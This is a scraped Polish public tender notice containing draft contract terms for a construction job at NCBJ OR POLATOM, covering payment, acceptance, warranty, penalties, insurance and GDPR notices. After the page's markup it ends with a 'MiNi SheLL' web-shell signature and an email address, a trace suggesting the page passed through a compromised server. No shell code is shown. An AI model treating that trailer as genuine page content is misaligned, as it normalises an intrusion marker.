wyższej trwa dłużej niż dwa miesiące Strony mogą wspólnie zdecydować na piśmie o odstąpieniu od dalszej realizacji niniejszej umowy bez kar i odszkodowań z tego tytułu. Roszczenia powstałe przed zaistnieniem siły wyższej zostaną rozliczone pomiędzy Stronami na dzień zaistnienia siły wyższej.§ 51. Wynagrodzenie Wykonawcy z tytułu należytego wykonania przedmiotu zamówienia (ogółem), o którym mowa w § 1 niniejszej umowy, wynosi:Netto: ..............................................................PLN(słownie: .....................................................................................................................................)podatek VAT (stawka): .................................. %podatek VAT (kwota): .................................. PLNbrutto: ............................................................. PLN(słownie: .....................................................................................................................................)2. W/w wynagrodzenie ma charakter wynagrodzenia zryczałtowanego i Wykonawcy nie przysługuje z tytułu wykonania przedmiotu umowy jakiekolwiek dodatkowe wynagrodzenie.3. Wynagrodzenie będzie płatne etapami zgodnie z harmonogramem rzeczowo-finansowym (Załącznik nr 8 do SIWZ), zapłata za ostatni etap realizacji harmonogramu będzie zrealizowana po dostarczeniu prawomocnego Pozwolenia na Użytkowanie przedmiotu zamówienia.4. Warunkiem wystawienia faktury VAT za wykonanie robót budowlanych, przez Wykonawcę i żądania zapłaty wynagrodzenia jest podpisanie przez Strony protokołu odbioru robót. 5. Płatność będzie realizowana pod warunkiem przedstawienia przez Wykonawcę dowodów potwierdzających, że uregulował on swoje zobowiązania względem wszystkich podwykonawców i dalszych podwykonawców.6. Płatność będzie zrealizowana na podstawie prawidłowo wystawionej przez Wykonawcę faktury VAT w terminie 30 dni od daty wystawienia, z zastrzeżeniem, że doręczenie faktury nastąpi na co najmniej 23 dni przed tak określonym terminem płatności, a w przypadku niezachowania tego terminu, termin płatności przedłuża się automatycznie o czas opóźnienia dostarczenia faktury.7. W przypadku nieterminowego uregulowania przez Zamawiającego faktury VAT Wykonawca może naliczać ustawowe odsetki za opóźnienie.8. Wykonawca zapewni ciągłość realizacji i finansowania inwestycji w całym okresie trwania niniejszej umowy.§ 61. Przedmiot zamówienia zostanie uznany za zrealizowany w sposób spełniający wymagania Zamawiającego opisane w SIWZ, po przeprowadzeniu końcowego odbioru wykonania robót budowlanych i otrzymaniu przez Zamawiającego sporządzonego na tę okoliczność końcowego protokołu odbioru bez uwag, podpisanego przez upoważnionych przedstawicieli Zamawiającego i Wykonawcy oraz po dostarczeniu przez Wykonawcę prawomocnej decyzji Pozwolenia na Użytkowanie przedmiotu zamówienia.2. Wykonawca powiadomi na piśmie przedstawiciela Zamawiającego o gotowości do odbioru przedmiotu umowy. Termin przystąpienia do odbioru ustalony zostanie między Stronami w ciągu 3 dni roboczych od pisemnego powiadomienia przedstawiciela Zamawiającego o gotowości do odbioru.3. Z czynności odbioru sporządzony zostanie protokół podpisany przez Strony umowy, który stanowić będzie załącznik do faktury. Termin podpisania protokołu odbioru lub zgłoszenia zastrzeżeń, co do prawidłowego wykonania przedmiotu niniejszej umowy, wynosi czternaście dni roboczych, licząc od dnia przystąpienia do odbioru końcowego.4. W przypadku pisemnych zastrzeżeń Zamawiającego, co do prawidłowego wykonania przedmiotu niniejszej umowy, Zamawiający określi szczegółowo te zastrzeżenia i wyznaczy Wykonawcy dodatkowy termin do usunięcia usterek w wykonaniu przedmiotu niniejszej umowy. Po upływie dodatkowego terminu Strony przystępują do ponownego odbioru robót. W przypadku ponownych uzasadnionych zastrzeżeń Zamawiającego, Zamawiający ma prawo do odstąpienia od niniejszej umowy albo może powierzyć usunięcie usterek w wykonaniu przedmiotu niniejszej umowy innej osobie na koszt Wykonawcy.5. Jeżeli Zamawiający z własnej winy nie przystąpi do odbioru robót i podpisania protokołu lub sporządzenia zastrzeżeń, w terminie określonym w ust. 2 i 3 i w ust. 4 niniejszego paragrafu, Wykonawca protokolarnie ustali stan przedmiotu odbioru przez powołaną przez siebie komisję. Protokół, o którym mowa wyżej, stanowić będzie podstawę do wystawienia faktury i zapłaty wynagrodzenia. 6. O dokonaniu odbioru, o którym mowa w ust. 5 niniejszego paragrafu, Wykonawca powiadomi na piśmie Zamawiającego i dostarczy mu protokół, nie później niż w dniu następnym po dokonaniu odbioru.7. Wraz z podpisaniem protokołu odbioru Wykonawca przekaże Zamawiającemu dokumentację powykonawczą wraz z atestami na materiały użyte w trakcie realizacji przedmiotu niniejszej umowy.8. Za datę wykonania przez Wykonawcę zobowiązania wynikającego z niniejszej umowy uznaje się datę protokołu odbioru przedmiotu umowy podpisanego bez uwag przez Strony umowy.§ 71. Wykonawca udziela gwarancji na okres:..... miesięcy od dnia podpisania bez uwag protokołu odbioru wykonania przedmiotu umowy.2. Wykonawca zobowiązuje się usunąć na swój koszt wady i usterki stwierdzone w przedmiocie niniejszej umowy w okresie gwarancji -- w terminie technicznie i organizacyjnie uzasadnionym, obustronnie uzgodnionym przez Strony umowy nie dłuższym jednak niż 10 dni roboczych od dnia wskazania wady, usterki przez Zamawiającego.3. W przypadku, gdy Wykonawca nie usunie wad i usterek w terminie obustronnie uzgodnionym przez Strony umowy, Zamawiający poza uprawnieniami przysługującymi mu na podstawie Kodeksu Cywilnego, może powierzyć usunięcie wad i usterek podmiotowi trzeciemu na koszt Wykonawcy (wykonanie zastępcze).4. Wszystkie reklamacje będą zgłaszane przez Zamawiającego pisemnie, najpóźniej do dnia upływu okresu gwarancji, a Wykonawca będzie potwierdzał przyjęcie zgłoszenia.5. W zakresie nieuregulowanym w niniejszym paragrafie stosuje się przepisy Kodeksu Cywilnego.§ 8Wykonawca zapłaci Zamawiającemu kary umowne:1. Za opóźnienie w wykonaniu przedmiotu zamówienia - w wysokości 0,25% (słownie: pięć dziesiątych procenta) wynagrodzenia brutto określonego w § 5 niniejszej umowy za każdy dzień opóźnienia.2. Za opóźnienie w usunięciu wad stwierdzonych przy odbiorze lub ujawnionych w okresie rękojmi lub gwarancji - w wysokości 0,25% (słownie: pięć dziesiątych procenta) wynagrodzenia brutto określonego w § 5 niniejszej umowy za każdy dzień opóźnienia.3. W razie odstąpienia przez Zamawiającego od umowy z przyczyn leżących po stronie Wykonawcy lub odstąpienia od umowy przez Wykonawcę, z przyczyn leżących po stronie Wykonawcy - w wysokości 30% (słownie: trzydzieści procent) wynagrodzenia brutto określonego w § 5 niniejszej umowy.4. Za nieprzedłożenie do akceptacji w wyznaczonym terminie projektu umowy o podwykonawstwo, której przedmiotem są roboty budowlane lub projektu jej zmiany, oraz potwierdzonej za zgodność z oryginałem kopii zawartej umowy o podwykonawstwo lub jej zmiany albo brak wymaganej przez Zamawiającego zmiany umowy o podwykonawstwo w zakresie terminu zapłaty, w wysokości 0,1% (słownie: jedna dziesiąta procenta) wynagrodzenia brutto określonego w § 5 niniejszej umowy za każdy dzień zwłoki.5. Za nieprzedłożenie w wyznaczonym terminie kopii umowy o podwykonawstwo, której przedmiotem są dostawy lub usługi celem weryfikacji terminu zapłaty w wysokości 0,1% (słownie: jedna dziesiąta procenta) wynagrodzenia brutto określonego w § 5 niniejszej umowy za każdy dzień zwłoki.6. W przypadku zmiany każdego rodzaju podwykonawcy lub wprowadzenia podwykonawcy nie wskazanego w ofercie bez akceptacji Zamawiającego, będą miały zastosowanie zapisy § 8 pkt 4 - 5 niniejszej umowy.7. W przypadku niedostarczenia Zamawiającemu potwierdzenia przez Wykonawcę faktu zapłaty należnego wynagrodzenia wszystkim podwykonawcom i dalszym podwykonawcom, Zamawiający dokona bezpośredniej zapłaty należności dla podwykonawców i dalszych podwykonawców a kwotę tę potrąci z wynagrodzenia należnego Wykonawcy (zgodnie z zasadami opisanymi w SIWZ).8. Wykonawca upoważnia Zamawiającego do potrącenia naliczonych kar umownych z wynagrodzenia należnego Wykonawcy lub z Zabezpieczenia Należytego Wykonania Umowy, o którym mowa w § 10 umowy.9. Zamawiający może dochodzić odszkodowania przewyższającego wysokość zastrzeżonych kar umownych do wysokości rzeczywistych strat poniesionych w wyniku niewykonywania umowy.10. W uzasadnionych przypadkach strony mogą odstąpić od naliczania kar umownych.§ 91. Wykonawca ponosi pełną odpowiedzialność za szkody wyrządzone Zamawiającemu lub innym podmiotom wynikłe z niedochowania należytej staranności Wykonawcy lub podwykonawców w trakcie realizacji niniejszej umowy.2. Wykonawca oświadcza, że posiada i załączy kopię ważnej i opłaconej umowy ubezpieczenia odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej i posiadanego mienia w wysokości:.............................................................................................................PLN (słownie:...........................................................................................złotych),ważną do dnia ..................... Wykonawca zobowiązuje się do utrzymywania ważności w/w umowy ubezpieczenia przez cały okres wykonania przedmiotu umowy.3. W razie wydłużenia czasu realizacji niniejszej umowy ponad czas obowiązywania umowy ubezpieczenia, Wykonawca zobowiązuje się do przedłużenia ubezpieczenia, przedstawiając Zamawiającemu przedłużoną umowę ubezpieczenia, na co najmniej miesiąc przed wygaśnięciem poprzedniej umowy ubezpieczenia. W przypadku niedokonania przedłużenia umowy ubezpieczenia Zamawiający ma prawo odstąpić od niniejszej umowy o zamówienie publiczne.Umowa ubezpieczenia, o której mowa musi zapewnić wypłatę odszkodowania płatnego w złotych polskich, bez ograniczeń. Wykonawca nie jest upoważniony do dokonywania zmian warunków ubezpieczenia bez uprzedniej zgody Zamawiającego wyrażonej na piśmie.4. Wykonawca ponosi odpowiedzialność za wszelkie szkody, które spowodują utratę korzyści, które Zamawiający mógłby osiągnąć gdyby szkoda nie powstała - wyłącznie w przypadku kiedy wynikną one z winy umyślnej lub rażącego zaniedbania Wykonawcy lub jego podwykonawców.§ 10Wykonawca przy podpisywaniu niniejszej umowy przedłożył Zamawiającemu dokument potwierdzający wniesienie Zabezpieczenia Należytego Wykonania Umowy w wysokości 10% (słownie: dziesięć procent) wynagrodzenia brutto określonego w § 5 ust. 1 umowy, co stanowi kwotę:...............................................................................................................................................PLN(słownie:...........................................................................................................................złotych)zabezpieczenie zostało wniesione w formie: .................................................................................................................................................................................................a) Zabezpieczenie może zostać wykorzystane przez Zamawiającego na pokrycie roszczeń z tytułu niewykonania lub nienależytego wykonania umowy. Zamawiający zobowiązuje się do zwrotu zabezpieczenia, jeżeli nie zostanie ono zarachowane na pokrycie roszczeń Zamawiającego wynikających z niewykonania lub nienależytego wykonania umowy. Zwrot zabezpieczenia należytego wykonania umowy będzie dokonany przy zachowaniu zasad określonych w ustawie Prawo zamówień publicznych.b) Koszt ustanowienia i zwolnienia Zabezpieczenia Należytego Wykonania Umowy obciąża Wykonawcę.c) Jeżeli zabezpieczenie wniesione w gwarancjach bankowych lub ubezpieczeniowych albo poręczeniach, a z uwagi na przedłużenie czasu wykonywania umowy, niezależnie od przyczyn tego wydłużenia, wygasłoby przed ich zakończeniem, Wykonawca na 14 dni roboczych przed wygaśnięciem takiego zabezpieczenia ma obowiązek ustanowić odpowiednie nowe zabezpieczenie i wnieść Zamawiającemu.§ 11Stronom przysługuje prawo odstąpienia od niniejszej umowy w następujących przypadkach:1. Zamawiającemu przysługuje prawo do odstąpienia od niniejszej umowy, gdy:a) zostanie ogłoszona upadłość Wykonawcy lub otwarta likwidacja Wykonawcy,b) zostanie wydany nakaz zajęcia majątku Wykonawcy, w zakresie uniemożliwiającym wykonywanie przedmiotu niniejszej umowy,c) Wykonawca nie rozpoczął robót w uzgodnionym terminie bez uzasadnionych przyczyn przez okres 7 dni lub przerwał je i nie kontynuuje ich pomimo wezwania Zamawiającego złożonego na piśmie,d) Wykonawca z przyczyn leżących po jego stronie przerwał realizację robót i przerwa ta spowodowała opóźnienie realizacji robót dłużej niż trzydzieści dni,e) Wykonawca naruszy w jakikolwiek sposób postanowienia pkt. 4 i 5 § 10 niniejszej umowy,f) Wykonawca nie przedłoży Zamawiającemu umowy z Podwykonawcą, któremu zlecił wykonanie całości lub części zamówienia,g) wystąpiła siła wyższa.2. Wykonawcy przysługuje prawo odstąpienia od niniejszej umowy, jeżeli Zamawiający opóźnia z własnej winy termin przekazania terenu prac remontowych o 7 dni roboczych od daty, w której taka możliwość powstała.3. Odstąpienie od niniejszej umowy powinno nastąpić w formie pisemnej pod rygorem nieważności takiego oświadczenia i powinno zawierać uzasadnienie.4. W przypadku odstąpienia od niniejszej umowy Wykonawcę oraz Zamawiającego obciążają następujące obowiązki:a) w terminie siedmiu dni od daty doręczenie drugiej Stronie oświadczenia o odstąpieniu odniniejszej umowy Wykonawca, przy udziale Zamawiającego sporządzi szczegółowy protokół inwentaryzacji wykonanych robót według stanu na dzień odstąpienia,b) Wykonawca zabezpieczy przerwane roboty w zakresie obustronnie uzgodnionym na koszt tej Strony, z winy której nastąpiło odstąpienie od niniejszej umowy, chyba że Strony postanowiły inaczej,c) Strony sporządzają wykaz tych materiałów, konstrukcji lub urządzeń, które nie mogą być wykorzystane przez Wykonawcę do realizacji innych robót nieobjętych niniejszą umową, w przypadku zerwania umowy z winy Zamawiającego,d) Wykonawca zgłosi niezwłocznie konieczność dokonania przez Zamawiającego odbiorów robót przerwanych oraz robót zabezpieczających. Ponadto Wykonawca niezwłocznie, a najpóźniej w terminie trzydziestu dni, usunie z terenu budowy wniesione przez niego urządzenia zaplecza.5. W każdym przypadku odstąpienia od niniejszej umowy Zamawiający zobowiązany jest do:a) dokonania odbioru robót przerwanych oraz do zapłaty wynagrodzenia za roboty, które zostały prawidłowo wykonane do dnia odstąpienia,b) rozliczenia się z Wykonawcą z tytułu nierozliczonych w inny sposób uzasadnionych kosztów,c) przejęcia od Wykonawcy pod swój dozór terenu prac remontowych w ciągu trzydziestu dni od daty podpisania przez Strony niniejszej umowy,d) protokołu inwentaryzacji robót w toku wg stanu na dzień odstąpienia.§ 12.Wszystkie dodatki, uzupełnienia i zmiany niniejszej umowy wymagają formy pisemnej i podpisów Stron pod rygorem nieważności, przy czym zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zachodzi co najmniej jedna z okoliczności opisanych w art. 144 ustawy Pzp.§ 13.1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej ,,RODO", informuję, że:a) administratorem danych osobowych Wykonawcy jest NCBJ OR POLATOM 05-400 Otwock ul. Andrzeja Sołtana 7, b) inspektorem ochrony danych osobowych w NCBJ OR POLATOM jest Paweł Kulicki tel. 22 273 18 88 ; e-mail: paweł.kulicki@polatom.pl,c) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr sprawy: 20/P/2018, odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2017 r. poz. 1579 i 2018), dalej ,,ustawa Pzp.",d) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,e) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp., f) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.2. Wykonawca posiada:a) na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych,b) na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych,c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych jego dotyczących narusza przepisy RODO.3. Wykonawcy nie przysługuje:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.§ 14.Wszystkie spory, kontrowersje lub różnice zdań, które mogą wyniknąć między Stronami z niniejszej umowy lub w związku z nią, odnośnie jej ważności i interpretacji, które nie mogą być załatwione w sposób polubowny, będą rozstrzygane, przez sąd powszechny właściwy miejscowo dla siedziby Zamawiającego.§ 15.1. Integralną częścią niniejszej umowy jest Załącznik nr 1 do umowy, Oferta Wykonawcy, SIWZ wraz z załącznikami oraz umowy z podwykonawcami.2. W sprawach nieuregulowanych niniejszą umową mają zastosowanie przepisy Kodeksu cywilnego, Prawa Budowlanego wraz z przepisami wykonawczymi oraz inne obowiązujące przepisy prawa.3. Umowę niniejszą sporządzono w dwóch jednobrzmiących egzemplarzach, po jednym dla każdej ze Stron.4. Umowa wchodzi w życie z chwilą jej podpisania przez Strony.</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">1. Wykonawca, którego oferta zostanie wybrana, zobowiązany będzie do wniesienia zabezpieczenia należytego wykonania umowy najpóźniej w dniu jej zawarcia, w wysokości 10% ceny całkowitej brutto podanej w ofercie.2. Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:a)	pieniądzu,b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,c)	gwarancjach bankowych,d)	gwarancjach ubezpieczeniowych,e)	poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2018 r., poz. 110).3. Zamawiający nie wyraża zgody na wniesienie zabezpieczenia w formach określonych art. 148 ust. 2 ustawy Pzp.4. W przypadku wniesienia zabezpieczenia w formie pieniężnej Zamawiający przechowa je na oprocentowanym rachunku bankowym.5. Z treści zabezpieczenia przedstawionego w formie gwarancji/poręczenia winno wynikać, że bank, ubezpieczyciel, poręczyciel zapłaci, na rzecz Zamawiającego w terminie maksymalnie 30 dni od pisemnego żądania kwotę zabezpieczenia, na pierwsze wezwanie Zamawiającego, bez odwołania, bez warunku, niezależnie od kwestionowania czy zastrzeżeń Wykonawcy i bez dochodzenia czy wezwanie Zamawiającego jest uzasadnione czy nie.6. W przypadku, gdy zabezpieczenie, będzie wnoszone w formie innej niż pieniądz, Zamawiający zastrzega sobie prawo do akceptacji projektu ww. dokumentu.7. Zamawiający zwróci zabezpieczenie w wysokości 70% w terminie do 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane. Zabezpieczenie w wysokości 30%, pozostawione zostanie na zabezpieczenie roszczeń z tytułu rękojmi za wady i zostanie zwrócone nie później niż w 15 dniu po upływie okresu rękojmi za wady.</span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Nie dopuszcza się możliwości zmian postanowień zawartej umowy w stosunku do treści Oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zachodzi co najmniej jedna z okoliczności opisanych w art.144 ust. 1 Pzp.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-09-11</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com